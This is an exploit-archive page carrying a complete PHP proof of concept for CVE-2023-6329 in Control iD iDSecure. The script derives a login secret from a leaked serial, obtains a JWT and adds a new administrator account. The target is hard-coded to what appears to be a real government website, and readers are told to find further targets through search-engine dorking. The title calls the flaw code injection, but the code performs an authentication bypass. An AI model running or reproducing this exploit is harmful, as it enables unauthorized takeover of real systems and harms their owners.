Share
## https://sploitus.com/exploit?id=PACKETSTORM:189528
=============================================================================================================================================
| # Title : Control iD iDSecure v4.7.43.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://profil.nunukankab.go.id/org/dkisp |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: The code exploits a vulnerability in the ControlID system to add a new administrative user without requiring an existing password.
( https://packetstorm.news/files/id/180858/ CVE-2023-6329)
[+] save code as poc.php.
[+] Set Target : line 114
[+] USage : php poc.php
[+] PayLoad :
<?php
class ControlIDExploit {
private $target;
private $new_user;
private $new_password;
public function __construct($target, $new_user, $new_password) {
$this->target = rtrim($target, '/'); // إزالة أي "/" زائدة في النهاية
$this->new_user = $new_user;
$this->new_password = $new_password;
}
private function send_request($method, $uri, $data = null, $headers = []) {
$url = "{$this->target}{$uri}";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // مهلة الطلب 10 ثوانٍ
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data, JSON_UNESCAPED_UNICODE));
$headers[] = 'Content-Type: application/json';
}
if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($error) {
die(" Error connecting to $url: $error\n");
}
if ($http_code == 404) {
die(" Unexpected response (404 - Not Found): Check the link is valid $url\n");
}
return json_decode(mb_convert_encoding($response, 'UTF-8', 'auto'), true);
}
public function exploit() {
echo " Trying to get the raw data...\n";
// 1) الحصول على serial و passwordRandom
$response = $this->send_request('GET', '/api/login/unlockGetData');
if (!isset($response['passwordRandom']) || !isset($response['serial'])) {
die("❌ Failed to get raw data. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
$password_random = $response['passwordRandom'];
$serial = $response['serial'];
echo " Retrieved passwordRandom: $password_random\n";
echo " Retrieved serial: $serial\n";
// 2) إنشاء passwordCustom
$sha1_hash = sha1($serial);
$combined_string = $sha1_hash . $password_random . 'cid2016';
$sha256_hash = hash('sha256', $combined_string);
$short_hash = substr($sha256_hash, 0, 6);
$password_custom = hexdec($short_hash);
echo " Created passwordCustom: $password_custom\n";
// 3) تسجيل الدخول للحصول على JWT
echo "Attempt to login...\n";
$login_data = [
'passwordCustom' => (string)$password_custom,
'passwordRandom' => $password_random
];
$response = $this->send_request('POST', '/api/login/', $login_data);
if (!isset($response['accessToken'])) {
die(" Login failed. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
$access_token = $response['accessToken'];
echo " Obtained JWT: $access_token\n";
// 4) إضافة مستخدم إداري جديد
echo " Trying to add a new user...\n";
$user_data = [
'idType' => '1',
'name' => $this->new_user,
'user' => $this->new_user,
'newPassword' => $this->new_password,
'password_confirmation' => $this->new_password
];
$headers = [
"Authorization: Bearer $access_token"
];
$response = $this->send_request('POST', '/api/operator/', $user_data, $headers);
if (!isset($response['code']) || $response['code'] != 200) {
die(" Failed to add new user. Response: " . json_encode($response, JSON_UNESCAPED_UNICODE) . "\n");
}
echo " User added successfully: {$this->new_user}:{$this->new_password}\n";
}
}
// 🔥 أدخل بيانات الاستهداف هنا
$target_host = 'https://profil.nunukankab.go.id'; // استبدل بعنوان الموقع
$new_admin_user = 'adminuser';
$new_admin_password = 'securepassword';
// تشغيل الكود
$exploit = new ControlIDExploit($target_host, $new_admin_user, $new_admin_password);
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================